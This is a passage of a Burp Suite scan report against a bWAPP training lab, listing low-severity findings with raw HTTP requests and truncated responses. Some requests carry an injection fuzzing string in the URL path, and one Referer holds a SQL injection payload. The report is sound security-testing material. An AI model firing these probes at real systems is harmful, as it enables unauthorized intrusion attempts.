    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:52 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53949

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.18. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:43:07 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 53861
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.19. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/php_cgi.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:06:03 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 54855

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.20. http://192.168.52.147/bWAPP/aim.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/aim.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/aim.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/http_response_splitting.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 9959

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />

    <title>bWAPP -
    ...[SNIP]...
    18.21. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_captcha_bypass.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_captcha_bypass.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13484

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.22. http://192.168.52.147/bWAPP/ba_forgotten.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_forgotten.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_forgotten.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12977

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.23. http://192.168.52.147/bWAPP/ba_insecure_login.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_insecure_login.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: ba_insecure_login_2.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.24. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 15303

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.25. http://192.168.52.147/bWAPP/ba_pwd_attacks.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_pwd_attacks.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: ba_pwd_attacks_2.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.26. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_pwd_attacks_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13504

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.27. http://192.168.52.147/bWAPP/ba_weak_pwd.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_weak_pwd.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_weak_pwd.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/sqli_11.php?title=ben%27+OR+%271%27+%3D+%271--&action=search
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:58:20 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13329

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.28. http://192.168.52.147/bWAPP/bof_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/bof_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/bof_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13166

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.29. http://192.168.52.147/bWAPP/bof_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/bof_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/bof_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12971

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.30. http://192.168.52.147/bWAPP/captcha_box.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/captcha_box.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/captcha_box.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/manual_interv.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:58:59 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Length: 404
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <title>bWAPP - CAPTCHA box</title>

    </head>

    <body>

    <table>

    <tr>


    ...[SNIP]...
    18.31. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/cgi-bin/shellshock.sh

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/shellshock.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:26 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Connection: close
    Content-Type: text/html
    Content-Length: 288

    <!DOCTYPE html>
    <html>
    <head>
    <link rel=stylesheet type=text/css href=../stylesheets/stylesheet.css />
    <title>bWAPP - Shellshock Vulnerability (CGI)</title>
    </head>
    <body>
    <div id=frame>
    <p><i>
    This i
    ...[SNIP]...
    18.32. http://192.168.52.147/bWAPP/clickjacking.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/clickjacking.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/clickjacking.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/http_verb_tampering.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:55 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13401

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.33. http://192.168.52.147/bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    POST /bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/clickjacking.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 31
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

    ticket_quantity=10&action=order

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 04:18:52 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.34. http://192.168.52.147/bWAPP/commandi.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/ldap_connect.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:53:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12927

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.35. http://192.168.52.147/bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ldap_connect.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 04:17:45 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.36. http://192.168.52.147/bWAPP/commandi_blind.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi_blind.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/commandi_blind.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
